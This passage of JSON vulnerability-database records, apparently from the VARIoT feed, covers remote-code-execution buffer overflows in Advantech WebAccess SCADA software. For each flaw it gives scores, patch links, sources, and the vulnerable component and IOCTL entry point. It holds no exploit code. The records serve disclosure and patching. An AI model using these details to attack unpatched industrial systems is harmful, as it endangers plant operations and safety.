"NVD", "id": "CVE-2015-6467" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-323" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Arbitrary code execution vulnerability", "sources": [ { "db": "IVD", "id": "64df8e80-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00429" }, { "db": "CNNVD", "id": "CNNVD-201601-323" } ], "trust": 1.4 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "lack of information", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-323" } ], "trust": 0.6 } }
var-201909-0989
Vulnerability from variot
In WebAccess versions 8.4.1 and prior, multiple stack-based buffer overflow vulnerabilities are caused by a lack of proper validation of the length of user-supplied data. Exploitation of these vulnerabilities may allow remote code execution. WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within cnvlgxtag.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a set of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. The vulnerability stems from the fact that the program does not properly verify the length of user input data
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.4.1" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 1.4, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.4.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "657b7724-95c3-4f17-828d-8047ba03b978" }, { "db": "ZDI", "id": "ZDI-19-847" }, { "db": "ZDI", "id": "ZDI-19-843" }, { "db": "CNVD", "id": "CNVD-2019-32469" }, { "db": "JVNDB", "id": "JVNDB-2019-009491" }, { "db": "NVD", "id": "CVE-2019-13556" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-009491" } ] }, "credits": { "_id": null, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-19-847" }, { "db": "ZDI", "id": "ZDI-19-843" }, { "db": "CNNVD", "id": "CNNVD-201909-837" } ], "trust": 2.0 }, "cve": "CVE-2019-13556", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CVE-2019-13556", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CNVD-2019-32469", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "657b7724-95c3-4f17-828d-8047ba03b978", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "VHN-145414", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-13556", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.4, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2019-13556", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 8.8, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2019-13556", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "Low", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2019-13556", "trust": 1.4, "value": "CRITICAL" }, { "author": "nvd@nist.gov", "id": "CVE-2019-13556", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2019-13556", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2019-32469", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201909-837", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "657b7724-95c3-4f17-828d-8047ba03b978", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-145414", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "657b7724-95c3-4f17-828d-8047ba03b978" }, { "db": "ZDI", "id": "ZDI-19-847" }, { "db": "ZDI", "id": "ZDI-19-843" }, { "db": "CNVD", "id": "CNVD-2019-32469" }, { "db": "VULHUB", "id": "VHN-145414" }, { "db": "JVNDB", "id": "JVNDB-2019-009491" }, { "db": "CNNVD", "id": "CNNVD-201909-837" }, { "db": "NVD", "id": "CVE-2019-13556" } ] }, "description": { "_id": null, "data": "In WebAccess versions 8.4.1 and prior, multiple stack-based buffer overflow vulnerabilities are caused by a lack of proper validation of the length of user-supplied data. Exploitation of these vulnerabilities may allow remote code execution. WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within cnvlgxtag.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a set of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. The vulnerability stems from the fact that the program does not properly verify the length of user input data", "sources": [ { "db": "NVD", "id": "CVE-2019-13556" }, { "db": "JVNDB", "id": "JVNDB-2019-009491" }, { "db": "ZDI", "id": "ZDI-19-847" }, { "db": "ZDI", "id": "ZDI-19-843" }, { "db": "CNVD", "id": "CNVD-2019-32469" }, { "db": "IVD", "id": "657b7724-95c3-4f17-828d-8047ba03b978" }, { "db": "VULHUB", "id": "VHN-145414" } ], "trust": 3.69 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2019-13556", "trust": 4.7 }, { "db": "ICS CERT", "id": "ICSA-19-260-01", "trust": 3.1 }, { "db": "ZDI", "id": "ZDI-19-847", "trust": 1.3 }, { "db": "CNNVD", "id": "CNNVD-201909-837", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-32469", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-009491", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9272", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9236", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-843", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2019.3558", "trust": 0.6 }, { "db": "IVD", "id": "657B7724-95C3-4F17-828D-8047BA03B978", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-145414", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "657b7724-95c3-4f17-828d-8047ba03b978" }, { "db": "ZDI", "id": "ZDI-19-847" }, { "db": "ZDI", "id": "ZDI-19-843" }, { "db": "CNVD", "id": "CNVD-2019-32469" }, { "db": "VULHUB", "id": "VHN-145414" }, { "db": "JVNDB", "id": "JVNDB-2019-009491" }, { "db": "CNNVD", "id": "CNNVD-201909-837" }, { "db": "NVD", "id": "CVE-2019-13556" } ] }, "id": "VAR-201909-0989", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "657b7724-95c3-4f17-828d-8047ba03b978" }, { "db": "CNVD", "id": "CNVD-2019-32469" }, { "db": "VULHUB", "id": "VHN-145414" } ], "trust": 1.33470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "657b7724-95c3-4f17-828d-8047ba03b978" }, { "db": "CNVD", "id": "CNVD-2019-32469" } ] }, "last_update_date": "2024-11-23T22:48:14.657000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 1.4, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess Buffer Overflow Vulnerability (CNVD-2019-32469)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/181513" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=98366" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-847" }, { "db": "ZDI", "id": "ZDI-19-843" }, { "db": "CNVD", "id": "CNVD-2019-32469" }, { "db": "JVNDB", "id": "JVNDB-2019-009491" }, { "db": "CNNVD", "id": "CNNVD-201909-837" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-787", "trust": 1.1 }, { "problemtype": "CWE-121", "trust": 1.0 }, { "problemtype": "CWE-119", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-145414" }, { "db": "JVNDB", "id": "JVNDB-2019-009491" }, { "db": "NVD", "id": "CVE-2019-13556" } ] }, "references": { "_id": null, "data": [ { "trust": 4.5, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13556" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-13556" }, { "trust": 0.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-847/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.3558/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-847" }, { "db": "ZDI", "id": "ZDI-19-843" }, { "db": "CNVD", "id": "CNVD-2019-32469" }, { "db": "VULHUB", "id": "VHN-145414" }, { "db": "JVNDB", "id": "JVNDB-2019-009491" }, { "db": "CNNVD", "id": "CNNVD-201909-837" }, { "db": "NVD", "id": "CVE-2019-13556" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "657b7724-95c3-4f17-828d-8047ba03b978", "ident": null }, { "db": "ZDI", "id": "ZDI-19-847", "ident": null }, { "db": "ZDI", "id": "ZDI-19-843", "ident": null }, { "db": "CNVD", "id": "CNVD-2019-32469", "ident": null }, { "db": "VULHUB", "id": "VHN-145414", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2019-009491", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201909-837", "ident": null }, { "db": "NVD", "id": "CVE-2019-13556", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2019-09-21T00:00:00", "db": "IVD", "id": "657b7724-95c3-4f17-828d-8047ba03b978", "ident": null }, { "date": "2019-09-17T00:00:00", "db": "ZDI", "id": "ZDI-19-847", "ident": null }, { "date": "2019-09-17T00:00:00", "db": "ZDI", "id": "ZDI-19-843", "ident": null }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32469", "ident": null }, { "date": "2019-09-18T00:00:00", "db": "VULHUB", "id": "VHN-145414", "ident": null }, { "date": "2019-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-009491", "ident": null }, { "date": "2019-09-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201909-837", "ident": null }, { "date": "2019-09-18T22:15:11.217000", "db": "NVD", "id": "CVE-2019-13556", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2019-09-17T00:00:00", "db": "ZDI", "id": "ZDI-19-847", "ident": null }, { "date": "2019-09-17T00:00:00", "db": "ZDI", "id": "ZDI-19-843", "ident": null }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32469", "ident": null }, { "date": "2020-10-16T00:00:00", "db": "VULHUB", "id": "VHN-145414", "ident": null }, { "date": "2019-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-009491", "ident": null }, { "date": "2020-10-19T00:00:00", "db": "CNNVD", "id": "CNNVD-201909-837", "ident": null }, { "date": "2024-11-21T04:25:08.593000", "db": "NVD", "id": "CVE-2019-13556", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201909-837" } ], "trust": 0.6 }, "title": { "_id": null, "data": "WebAccess Buffer error vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-009491" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "657b7724-95c3-4f17-828d-8047ba03b978" }, { "db": "CNNVD", "id": "CNNVD-201909-837" } ], "trust": 0.8 } }
var-201904-0181
Vulnerability from variot
Advantech WebAccess/SCADA, Versions 8.3.5 and prior. Multiple stack-based buffer overflow vulnerabilities, caused by a lack of proper validation of the length of user-supplied data, may allow remote code execution. Advantech WebAccess/SCADA Contains a buffer error vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwthinfl.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a set of browser-based SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A buffer overflow vulnerability exists in Advantech WebAccess/SCADA. This vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in execution to other associated memory locations. erroneous read and write operations
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 8.4, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.3.5" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "advantech", "version": "8.3.5 and less" }, { "_id": null, "model": "webaccess/scada", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.5" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "4d85a7a9-a091-4c59-84e6-73c8b6639498" }, { "db": "ZDI", "id": "ZDI-19-322" }, { "db": "ZDI", "id": "ZDI-19-311" }, { "db": "ZDI", "id": "ZDI-19-329" }, { "db": "ZDI", "id": "ZDI-19-325" }, { "db": "ZDI", "id": "ZDI-19-313" }, { "db": "ZDI", "id": "ZDI-19-328" }, { "db": "ZDI", "id": "ZDI-19-318" }, { "db": "ZDI", "id": "ZDI-19-321" }, { "db": "ZDI", "id": "ZDI-19-330" }, { "db": "ZDI", "id": "ZDI-19-315" }, { "db": "ZDI", "id": "ZDI-19-323" }, { "db": "ZDI", "id": "ZDI-19-327" }, { "db": "CNVD", "id": "CNVD-2019-08948" }, { "db": "JVNDB", "id": "JVNDB-2019-003121" }, { "db": "NVD", "id": "CVE-2019-6550" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-003121" } ] }, "credits": { "_id": null, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-19-322" }, { "db": "ZDI", "id": "ZDI-19-311" }, { "db": "ZDI", "id": "ZDI-19-329" }, { "db": "ZDI", "id": "ZDI-19-325" }, { "db": "ZDI", "id": "ZDI-19-313" }, { "db": "ZDI", "id": "ZDI-19-328" }, { "db": "ZDI", "id": "ZDI-19-318" }, { "db": "ZDI", "id": "ZDI-19-330" }, { "db": "ZDI", "id": "ZDI-19-315" }, { "db": "ZDI", "id": "ZDI-19-323" }, { "db": "ZDI", "id": "ZDI-19-327" } ], "trust": 7.7 }, "cve": "CVE-2019-6550", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2019-6550", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2019-08948", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "4d85a7a9-a091-4c59-84e6-73c8b6639498", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-157985", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-6550", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 8.4, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-6550", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2019-6550", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2019-6550", "trust": 8.4, "value": "CRITICAL" }, { "author": "nvd@nist.gov", "id": "CVE-2019-6550", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2019-6550", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2019-08948", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201904-089", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "4d85a7a9-a091-4c59-84e6-73c8b6639498", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-157985", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2019-6550", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "4d85a7a9-a091-4c59-84e6-73c8b6639498" }, { "db": "ZDI", "id": "ZDI-19-322" }, { "db": "ZDI", "id": "ZDI-19-311" }, { "db": "ZDI", "id": "ZDI-19-329" }, { "db": "ZDI", "id": "ZDI-19-325" }, { "db": "ZDI", "id": "ZDI-19-313" }, { "db": "ZDI", "id": "ZDI-19-328" }, { "db": "ZDI", "id": "ZDI-19-318" }, { "db": "ZDI", "id": "ZDI-19-321" }, { "db": "ZDI", "id": "ZDI-19-330" }, { "db": "ZDI", "id": "ZDI-19-315" }, { "db": "ZDI", "id": "ZDI-19-323" }, { "db": "ZDI", "id": "ZDI-19-327" }, { "db": "CNVD", "id": "CNVD-2019-08948" }, { "db": "VULHUB", "id": "VHN-157985" }, { "db": "VULMON", "id": "CVE-2019-6550" }, { "db": "JVNDB", "id": "JVNDB-2019-003121" }, { "db": "CNNVD", "id": "CNNVD-201904-089" }, { "db": "NVD", "id": "CVE-2019-6550" } ] }, "description": { "_id": null, "data": "Advantech WebAccess/SCADA, Versions 8.3.5 and prior. Multiple stack-based buffer overflow vulnerabilities, caused by a lack of proper validation of the length of user-supplied data, may allow remote code execution. Advantech WebAccess/SCADA Contains a buffer error vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwthinfl.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a set of browser-based SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A buffer overflow vulnerability exists in Advantech WebAccess/SCADA. This vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in execution to other associated memory locations. erroneous read and write operations", "sources": [ { "db": "NVD", "id": "CVE-2019-6550" }, { "db": "JVNDB", "id": "JVNDB-2019-003121" }, { "db": "ZDI", "id": "ZDI-19-321" }, { "db": "ZDI", "id": "ZDI-19-327" }, { "db": "ZDI", "id": "ZDI-19-323" }, { "db": "ZDI", "id": "ZDI-19-315" }, { "db": "ZDI", "id": "ZDI-19-322" }, { "db": "ZDI", "id": "ZDI-19-330" }, { "db": "ZDI", "id": "ZDI-19-318" }, { "db": "ZDI", "id": "ZDI-19-328" }, { "db": "ZDI", "id": "ZDI-19-313" }, { "db": "ZDI", "id": "ZDI-19-325" }, { "db": "ZDI", "id": "ZDI-19-329" }, { "db": "ZDI", "id": "ZDI-19-311" }, { "db": "CNVD", "id": "CNVD-2019-08948" }, { "db": "IVD", "id": "4d85a7a9-a091-4c59-84e6-73c8b6639498" }, { "db": "VULHUB", "id": "VHN-157985" }, { "db": "VULMON", "id": "CVE-2019-6550" } ], "trust": 10.08 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2019-6550", "trust": 11.8 }, { "db": "ICS CERT", "id": "ICSA-19-092-01", "trust": 3.2 }, { "db": "ZDI", "id": "ZDI-19-585", "trust": 1.8 }, { "db": "ZDI", "id": "ZDI-19-330", "trust": 1.3 }, { "db": "CNNVD", "id": "CNNVD-201904-089", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-08948", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-003121", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7914", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-322", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7899", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-311", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7924", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-329", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7927", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-325", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7901", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-313", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7882", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-328", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7910", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-318", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7920", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-321", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7930", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7903", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-315", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7925", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-323", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7881", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-327", "trust": 0.7 }, { "db": "BID", "id": "107675", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2019.1113", "trust": 0.6 }, { "db": "IVD", "id": "4D85A7A9-A091-4C59-84E6-73C8B6639498", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-157985", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2019-6550", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "4d85a7a9-a091-4c59-84e6-73c8b6639498" }, { "db": "ZDI", "id": "ZDI-19-322" }, { "db": "ZDI", "id": "ZDI-19-311" }, { "db": "ZDI", "id": "ZDI-19-329" }, { "db": "ZDI", "id": "ZDI-19-325" }, { "db": "ZDI", "id": "ZDI-19-313" }, { "db": "ZDI", "id": "ZDI-19-328" }, { "db": "ZDI", "id": "ZDI-19-318" }, { "db": "ZDI", "id": "ZDI-19-321" }, { "db": "ZDI", "id": "ZDI-19-330" }, { "db": "ZDI", "id": "ZDI-19-315" }, { "db": "ZDI", "id": "ZDI-19-323" }, { "db": "ZDI", "id": "ZDI-19-327" }, { "db": "CNVD", "id": "CNVD-2019-08948" }, { "db": "VULHUB", "id": "VHN-157985" }, { "db": "VULMON", "id": "CVE-2019-6550" }, { "db": "JVNDB", "id": "JVNDB-2019-003121" }, { "db": "CNNVD", "id": "CNNVD-201904-089" }, { "db": "NVD", "id": "CVE-2019-6550" } ] }, "id": "VAR-201904-0181", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "4d85a7a9-a091-4c59-84e6-73c8b6639498" }, { "db": "CNVD", "id": "CNVD-2019-08948" }, { "db": "VULHUB", "id": "VHN-157985" } ], "trust": 1.4466745799999998 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": 